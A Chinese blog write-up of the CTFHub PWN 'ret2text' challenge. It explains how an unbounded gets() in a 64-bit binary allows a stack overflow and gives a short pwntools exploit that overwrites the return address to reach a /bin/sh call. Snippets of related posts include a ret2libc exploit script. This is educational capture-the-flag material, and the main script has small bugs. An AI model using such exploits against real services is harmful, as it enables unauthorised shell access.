CTFHUB(PWN)Ret2Text

最新推荐文章于 2025-09-20 18:57:39 发布

原创最新推荐文章于 2025-09-20 18:57:39 发布 · 4.4k 阅读

2 ·

CC 4.0 BY-SA版权

文章标签：

#安全 #pwn

本文探讨了在64位程序中发现的栈溢出漏洞，通过IDA64分析发现gets函数不设长度限制。作者详细介绍了如何定位bin_sh函数地址，构造payload并使用pwn库进行远程攻击，最后演示了交互式shell获取flag的过程。

首先检查保护机制 checksec

64 位 + 什么保护都没开

然后放到ida64中查看

发现gets函数,没有限制数据的长度,容易发生栈溢出

shift+F12 找到bin_sh函数地址

64位程序直接读取偏移量

构造payload,编写exp

from pwn import*
p=remote("ip",端口)
binsh_addr=地址
payload='a'*(0x70+8)+p64(bin_sh)
p.sendline(payload)
p.interactive

连接成功后ls

cat flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Rt1Text

关注关注

3
点赞
踩
2

收藏

觉得还不错? 一键收藏
2
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

跟着CTF-wiki学pwn——ret2text

qq_42882717的博客

06-21

1432

肾么叫做万死不辞呀，就是每天被气死一万次，也不辞职…(哭哭

CTFhub-pwn-[ret2text]-writeup

m0_43405474的博客

08-26

2342

关于CTF pwn的简单入门题目，ret2text。

2 条评论您还未登录，请先登录后发表或查看评论

2 条评论

wwwjjjcccc 2022.11.12
为什么垃圾数据要加上一个八，而不是四？
- Rt1Text回复wwwjjjcccc 2022.11.16
  这是64位的,加8,32位加4

ret2text-CTFHub技能树

最新发布

2301_79910343的博客

09-20

366

在main函数的汇编语言界面，由 sub rsp,70h(h:十六进制) 且在64位系统中，故要覆盖掉ebp，就要再加8字节。汇编语言的lea指令：用于加载有效指令到寄存器，类似于c语言中的**&**符号，可以获取数据的地址而不是数据本身。局部变量s，用户由gets()输入，只要达到特定长度，就可以覆盖掉栈帧中的返回地址。32位环境：EBP;寄存器保存区：存放函数执行过程中需要暂时保存的寄存器值。发现main函数中存在无限制的gets函数，存在栈溢出。返回地址：存放函数执行完毕后，程序需要返回到的地址。

[CTFHub] ret2text

Lucien_Carr的博客

04-14

1147

gets_s（buffer,size）函数：从标准输入中读取数据，size表示的最多读取的数量，在这里是argv，没有定义是多大，所以我们就可以无限的输入。输入超过程序设定的字节数以后，就会发生栈溢出，多出的内容会覆盖返回地址。这个题目中要获得系统的shell，只需要先用垃圾数据填充填满数组的空间，再拼上系统system函数的返回地址就可以。只要我们能控制程序返回到0x4007B8（“/bin/sh”指令的地址），就可以得到系统的shell。我们攻击的目的主要是获得系统的控制权（也就是拿到shell）。

【PWN · ret2text】——[CTFHub]ret2text

Mr_Fmnwon的博客

04-20

3948

经典的ret2text流程。

CTFhub 技能树 PWN ret2text Python3 exp

break_cat的博客

11-17

1286

题目链接：https://www.ctfhub.com -> 技能树 -> PWN -> 栈溢出 -> ret2text WP：https://writeup.ctfhub.com/Skill/Pwn/%E6%A0%88%E6%BA%A2%E5%87%BA/eeca3548.html 搜exp的时候发现已经有人写过WP了，于是就Cirl+CV，发现原程序是用Python2写的，我的pwntools环境是Python3，因此程序需要稍作修改。 from pwn import * h

ctfhub 技能树pwn 栈溢出 ret2text

m0_75234353的博客

03-29

1109

看到v4这个变量的缓冲区，我们要把数据溢出到覆盖返回地址，即0x70+8。选中该行，看到下方的地址（4007B8）看到gets危险函数，再点开其中的v4。再shift+f12 直接查看相关字符。可以看到无任何的栈保护。输入：wq 保存退出。

CTFhub pwn

清霂的博客

02-04

1501

这里写目录标题1.ret2text2.ret2shellcode 1.ret2text file checksec ida64 gets函数有栈溢出漏洞，题目为ret2text即返回到text段得到shell shift+f12打开字符串窗口，找到/bin/sh 点进去，选中/bin/sh，右键，交叉引用列表（可以找到使用/bin/sh的地方）看到把/bin/sh放入rdi后，调用了system x64，64位系统中rdi，rsi，rdx，rcx，r8，r9作为调用函数的前6个参数，如果参数多于6

【PWN · IntegerOverflow & ret2text】[BJDCTF 2020]babystack2.0

Mr_Fmnwon的博客

05-27

1333

整数溢出漏洞——对于有/无符号数，长/短位宽转换时机器码的变换策略所指。整数溢出一般与其他堆栈溢出相结合，然而其中的内容其实远不止这些，还需要深层次刷题，进一步掌握了解整数溢出。

pwn ret2text

young‘s blog

02-06

1626

好久没有写博客了，今天记录一下做ctf-wiki上ret2text的过程，也记录一下学到的东西，一点一点积累成长。地址：ctf-wiki 源程序也在里面边看视频边学的，视频地址为: ret2text 程序下载好之后通过checksec查看保护措施：没有开启canary，32位动态链接程序知道程序的基本信息后运行一下程序，看看程序都有什么功能。测试后得知只有一个输入点。拖进ida分析一下...

CTFHub 栈溢出 ret2text exp代码

柠檬i的博客

10-09

2049

CTFHub 栈溢出 ret2text exp代码

ret2text

weixin_56301399的博客

07-20

639

第二步还是用反汇编，获取到system函数的地址。由于要完整调用，所以取lea指令的位置0x00000000004007b8，也就是0x4007b8。第一步利用反汇编，查看变量的位置，为[rbp-0x70]。从IDA中可以看出，pwn程序只有这两个用户函数，其他的都是库函数。让返回地址，也就是EIP指向system(‘/bin/sh’)所在语句对应的内存地址就能获得shell。局部变量s是用户可以通过gets()输入的，只要达到特定的长度L，就能覆盖掉黄色的返回地址。......

[CTFHub]ret2text-入土为安的第十二天

lzx13290757580的博客

08-01

285

ida fn+ F5 main 点(_int64)v4。v大小为0x70+栈基指针0x8+返回地址。

CTFHUB-PWN-ret2text

m0_64180167的博客

04-16

225

然后我们可以开始写payload。下载文件 checksec看看。然后看看shell的地址是多少。放入ida64 查看字符串。然后看看主函数怎么输入。

ctfhub pwn

m0_63253040的博客

09-09

381

被ida演了一波，gets不给参数，**********************给了system('/bin/sh')位置是0x4007B8。后来重新打开一遍就有了。

CTFpwn:ret2text,mprotece,shellcode,自动化rop链

2302_79813730的博客

01-25

1177

text:0000000000401324 75 EA jnz short loc_401310 #对比rbp里的值与rbx里的值，如果相同就继续运行程序，如果不同就返回0x401310。先将栈溢出的返回地址填成0x40132A，将需要的数据依次填入栈顶，依次弹入寄存器中，随后在执行到0x401334，retn返回的时候将返回地址填成0x401310，这样，我们就可以控制edi，rsi，rdx里的值，并调用write函数泄露基址。

ctf wiki pwn ret2libc

03-01

### CTF PWN Ret2libc 攻击教程与实例 Ret2libc是一种利用栈溢出漏洞的技术，在这种技术下，攻击者通过覆盖返回地址来调用系统中的现有函数（通常是`system()`），从而执行任意命令。当面对静态链接的二进制文件时，由于其缺少GOT/PLT表，“xxx is statically linked, skipping GOT/PLT symbols”的提示表明无法从这些地方获取库函数地址[^1]。对于动态链接的目标而言，可以通过操纵堆栈指针指向目标函数的实际位置实现ret2libc攻击；而对于静态编译的情况，则可以直接在`.text`段内寻找所需的函数入口点并加以利用。下面是一个简单的Python脚本用于演示如何实施ret2libc攻击： ```python from pwn import * # 设置远程连接参数 host = 'example.com' port = 9999 # 连接到服务端 conn = remote(host, port) # 假设已知偏移量为offset=108字节，并且存在可以控制的数据位于该处之后 offset = 108 # 获取/bin/sh字符串的位置以及system()函数的真实地址 bin_sh_addr = 0xdeadbeef # 需要替换为实际地址 system_addr = 0xbadc0de # 同上 payload = b'A' * offset + pack(system_addr) + b'JUNK' + pack(bin_sh_addr) # 发送载荷给服务器 conn.sendline(payload) # 切换到交互模式以便观察后续操作结果 conn.interactive() ``` 此代码片段展示了发送精心构造的有效负载至易受攻击的服务的过程，其中包含了必要的填充字符、system()函数地址及其参数"/bin/sh"所在内存区域的指针值。需要注意的是上述示例中使用的具体数值应当依据实际情况调整。